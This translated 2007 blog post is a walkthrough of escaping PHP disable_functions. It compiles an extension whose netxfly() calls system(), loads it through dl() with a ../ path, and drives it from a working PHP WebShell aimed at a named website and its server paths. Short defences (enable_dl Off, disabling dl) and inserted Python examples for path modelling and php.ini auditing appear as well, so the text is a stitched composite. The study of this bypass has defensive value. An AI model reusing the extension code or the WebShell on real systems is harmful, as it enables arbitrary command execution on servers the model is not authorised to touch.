Using a PHP extension module to bypass disable_functions and execute commands


Netxfly's Blog

Yesterday was my last day at work. Before leaving the office I had to return all of the company's assets (an X61, a token and a desktop), and the desktop has already been wiped (everything except the system disk cleared, and the system disk restored with Ghost). While sorting through the documents on the hard disk I found an article written on August 29, 2007, and I am posting it here; the method may well be out of date :)

Preface
PHP is a powerful and widely used scripting language, and a great many websites are built on it. The system(), exec(), passthru(), shell_exec() and proc_open() functions that PHP provides execute operating-system commands directly and are therefore a serious risk to the server. Administrators commonly list these functions under the disable_functions option in php.ini, which makes them unavailable to scripts and gets in the way of a penetration test.
The dl() function, however, loads a PHP extension module dynamically from within a script. It is governed by the enable_dl option, which is On by default and is usually overlooked by administrators, so we have an opportunity to load an extension module of our own that executes system commands. The extension_dir option names the directory modules are loaded from, but the argument to dl() is interpreted relative to that directory, so a path containing ../ components escapes it.
The test platform is Red Hat Linux 9 + Apache 2.0.59 + PHP 4.4.7.

Body
Suppose we have obtained a WebShell on the target site, but disable_functions blocks system(), exec(), passthru(), shell_exec() and proc_open(), so we cannot run a local root exploit to escalate privileges.
WebShell address: http://www.69ngo.com/include/cmd_class.php?cmd=info
The phpinfo() output confirms that system, exec, passthru, shell_exec and proc_open are disabled, while enable_dl = On and safe_mode = Off, as shown in the figure:


Compiling the PHP extension module
The target runs PHP 4.4.4 on Apache 2.0.52. Both are old; the oldest versions still offered for download on the official sites are php-4.4.7 and httpd-2.0.59, so the author builds against php-4.4.7.

1. Create a PHP extension module
The ext directory of the PHP source tree contains the ext_skel script, which generates a template for a PHP extension module and saves programmers most of the boilerplate.
tar -zxvf php-4.4.7.tar.gz
cd php-4.4.7/ext/
./ext_skel --extname=security

This creates an extension module named security and prints instructions on how to finish writing the module, as shown in the figure below:


After the command completes, a directory with the same name as the module exists under ext/, containing the files needed to build the module, as shown in the figure:

2. Configure the project
config.m4 is the build configuration file of the extension module. The relevant part of the generated file looks like this:

dnl If your extension references something external, use with:

dnl PHP_ARG_WITH(security, for security support,
dnl Make sure that the comment is aligned:
dnl [  --with-security             Include security support])

dnl Otherwise use enable:

dnl PHP_ARG_ENABLE(security, whether to enable security support,
dnl Make sure that the comment is aligned:
dnl [  --enable-security           Enable security support])

dnl marks an m4 comment, so as generated neither option is active. The template offers two configure switches: PHP_ARG_WITH is meant for extensions that depend on an external library, PHP_ARG_ENABLE for ones that do not. The author uncomments the PHP_ARG_WITH block, which yields the --with-security switch used in the build step below; appending =shared to that switch builds the module as a loadable security.so rather than linking it into the php binary. The edited file is shown in the figure:


3. Write the code
The template code is in security.c, and we add our own code to it.

/* {{{ security_functions[]
 *
 * Every user visible function must have an entry in security_functions[].
 */
zend_function_entry security_functions[] = {
	PHP_FE(confirm_security_compiled,	NULL)	/* For testing, remove later. */
	{NULL, NULL, NULL}	/* Must be the last line in security_functions[] */
};
/* }}} */
The table above is the module's function table: every function the module exposes to PHP scripts must have an entry in it. To add a new function named netxfly,

change PHP_FE(confirm_security_compiled, NULL) to PHP_FE(netxfly, NULL),
as shown in the figure:


A module function is defined with the PHP_FUNCTION(function_name) macro. Rename the confirm_security_compiled example function to netxfly and have it pass its string argument to the C library's system() function:

#include <stdlib.h>	/* system() */

PHP_FUNCTION(netxfly)
{
	char *arg = NULL;
	int arg_len;

	/* "s" takes one string argument from the PHP caller. */
	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s",
				  &arg, &arg_len) == FAILURE) {
		return;
	}

	/* disable_functions only hides PHP-level function names; nothing stops
	 * native code in a loaded module from calling libc directly. The
	 * command's output goes to the web server's stdout, not to the HTTP
	 * response, which is why the WebShell below redirects it to a file. */
	system(arg);
}

Then declare the netxfly function in php_security.h:

PHP_FUNCTION(netxfly);	/* my evil function */

4. Compile the extension module
cd ../../

rm -fr configure

./buildconf --force

./configure --with-security=shared

make

make install

If all goes well, security.a and security.so appear under php-4.4.7/modules. security.a is the static library; security.so is the shared extension module we wrote, as shown in the figure:


5. Test in the local environment

Write a test.php that loads the module and calls netxfly(). If the function executes successfully, a tmp.txt file appears in the script's working directory, as shown in the figure:


6. Deploy to the "production environment"

From the target's phpinfo() we know that extension_dir = /usr/lib/php4 and SCRIPT_FILENAME = /pub/vhosts/69ngo/www.69ngo.com/include/cmd_class.php. Upload security.so into the same directory as cmd_class.php. dl() resolves its argument relative to extension_dir, so three ../ components climb from /usr/lib/php4 to / and the module can be loaded from the WebShell with dl("../../../pub/vhosts/69ngo/www.69ngo.com/include/security.so");
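To make the path arithmetic in the previous paragraph concrete, here is an added example (not code from the original post): it models how PHP 4's dl() turns extension_dir plus the supplied filename into the path handed to dlopen(), checks whether the result still lies inside extension_dir, and shows the effect of the stricter rule later PHP versions apply (only a bare module name, no directory components). The concatenation mirrors the string handling the post relies on: an absolute argument would simply be appended to extension_dir, which is why ../ is needed. The directory and file names are those reported by the post's phpinfo() output; the ".." collapsing ignores symlinks, so it shows intent rather than what the kernel would finally open.

```python
"""Model of dl() path resolution against extension_dir (added example)."""
import posixpath

# Values taken from the target's phpinfo() in the post.
EXTENSION_DIR = "/usr/lib/php4"
EVIL_MODULE = "../../../pub/vhosts/69ngo/www.69ngo.com/include/security.so"


def resolve_dl_path(extension_dir: str, filename: str) -> str:
    """Path dlopen() receives: extension_dir + '/' + filename, '..' collapsed.

    PHP 4 concatenates the two strings without checking the filename, so an
    absolute filename does NOT replace extension_dir; it is appended to it.
    """
    joined = f"{extension_dir}/{filename}"
    return posixpath.normpath(joined)


def stays_inside(extension_dir: str, filename: str) -> bool:
    """True if the resolved module path is still under extension_dir."""
    root = posixpath.normpath(extension_dir)
    target = resolve_dl_path(extension_dir, filename)
    return target == root or target.startswith(root + "/")


def hardened_dl_allows(filename: str) -> bool:
    """Stricter rule of the kind later PHP versions apply to dl():
    the argument must be a plain module name with no directory parts."""
    return "/" not in filename and filename not in ("", ".", "..")


if __name__ == "__main__":
    print("resolved:", resolve_dl_path(EXTENSION_DIR, EVIL_MODULE))
    print("inside extension_dir:", stays_inside(EXTENSION_DIR, EVIL_MODULE))
    print("hardened dl() would allow it:", hardened_dl_allows(EVIL_MODULE))
```

Run it and the traversal path resolves to /pub/vhosts/69ngo/www.69ngo.com/include/security.so, outside extension_dir, while the bare-name rule rejects it outright.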

Write a simple WebShell:

<?php
if ($_GET['cmd'] != "")
{
    if (!strcmp($_GET['cmd'], "info"))
    {
        phpinfo();
    }
    else
    {
        // Load our module from outside extension_dir (/usr/lib/php4).
        dl("../../../pub/vhosts/69ngo/www.69ngo.com/include/security.so");

        // system() writes to the server's stdout, so capture the output in a file.
        $command = $_GET['cmd'] . " > tmp.txt";
        netxfly($command);
        echo file_get_contents("tmp.txt");
        echo "<br>The Command Completed Successfully!";
    }
}
else
{
    echo "Error ,;)";
}
?>



Upload the WebShell to the "production environment" (the target host), and the netxfly() function from security.so can be called to execute system commands, as shown in the figure:

Defences:
1. Set safe_mode = On (and enable_dl = Off), so that dl() cannot load external modules.
2. Add dl to the disable_functions list as well, so that the function is unavailable even if dynamic loading is otherwise permitted.
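The two defences above come down to three php.ini directives, so here is an added example (not part of the original post) that audits a php.ini fragment for them: it parses the file, decides whether dl() is still reachable from a script, and lists what to change. The weak fragment reproduces the settings the post read off the target's phpinfo(); the hardened one applies both defences. Both fragments are constructed here for illustration, and the parser handles only the simple `key = value` lines relevant to this check. (Two facts worth knowing when applying this today: safe_mode was removed in PHP 5.4, and since PHP 5.3 dl() is only available in the CLI, CGI and embed SAPIs, so on a modern web SAPI enable_dl and disable_functions are the controls that matter.)

```python
"""Audit php.ini for the settings that make dl() usable (added example)."""
from typing import Dict, List, Set

# Constructed fragment reproducing what the post's target reported.
WEAK_INI = """
; php.ini (constructed sample, matches the post's target)
safe_mode = Off
enable_dl = On
disable_functions = system,exec,passthru,shell_exec,proc_open
extension_dir = /usr/lib/php4
"""

# Constructed fragment with both defences from the post applied.
HARDENED_INI = """
; php.ini (constructed sample, hardened)
safe_mode = On
enable_dl = Off
disable_functions = "system,exec,passthru,shell_exec,proc_open,popen,dl"
extension_dir = /usr/lib/php4
"""

ON_VALUES = {"1", "on", "yes", "true"}


def parse_ini(text: str) -> Dict[str, str]:
    """Minimal php.ini reader: 'key = value' lines, ';' comments, lower-cased keys."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()          # drop comments
        if not line or line.startswith("[") or "=" not in line:
            continue                                  # skip sections/blank lines
        key, value = (part.strip() for part in line.split("=", 1))
        settings[key.lower()] = value.strip('"').strip("'")
    return settings


def is_on(value: str) -> bool:
    """PHP accepts several spellings for a boolean 'on'."""
    return value.strip().lower() in ON_VALUES


def disabled_functions(settings: Dict[str, str]) -> Set[str]:
    """Set of names listed in disable_functions (case-insensitive)."""
    raw = settings.get("disable_functions", "")
    return {name.strip().lower() for name in raw.split(",") if name.strip()}


def dl_reachable(settings: Dict[str, str]) -> bool:
    """True when a script can still call dl() to load an arbitrary module.

    Defaults mirror PHP's: enable_dl is On and safe_mode is Off when unset.
    """
    if not is_on(settings.get("enable_dl", "On")):
        return False                     # dynamic loading switched off
    if is_on(settings.get("safe_mode", "Off")):
        return False                     # PHP 4/5.x: safe_mode disables dl()
    if "dl" in disabled_functions(settings):
        return False                     # dl() removed like the other functions
    return True


def audit(ini_text: str) -> List[str]:
    """Return the list of weaknesses found; empty means both defences are in place."""
    settings = parse_ini(ini_text)
    findings: List[str] = []
    if is_on(settings.get("enable_dl", "On")):
        findings.append("enable_dl is On: set enable_dl = Off")
    if not is_on(settings.get("safe_mode", "Off")):
        findings.append("safe_mode is Off: dl() is not blocked by safe mode")
    if "dl" not in disabled_functions(settings):
        findings.append("dl is missing from disable_functions")
    return findings


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(label, "dl() reachable:", dl_reachable(parse_ini(ini)))
        for finding in audit(ini):
            print("  -", finding)
```

Any single finding closes the hole on its own, but the audit reports all three so the configuration does not depend on one setting an administrator might later relax.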
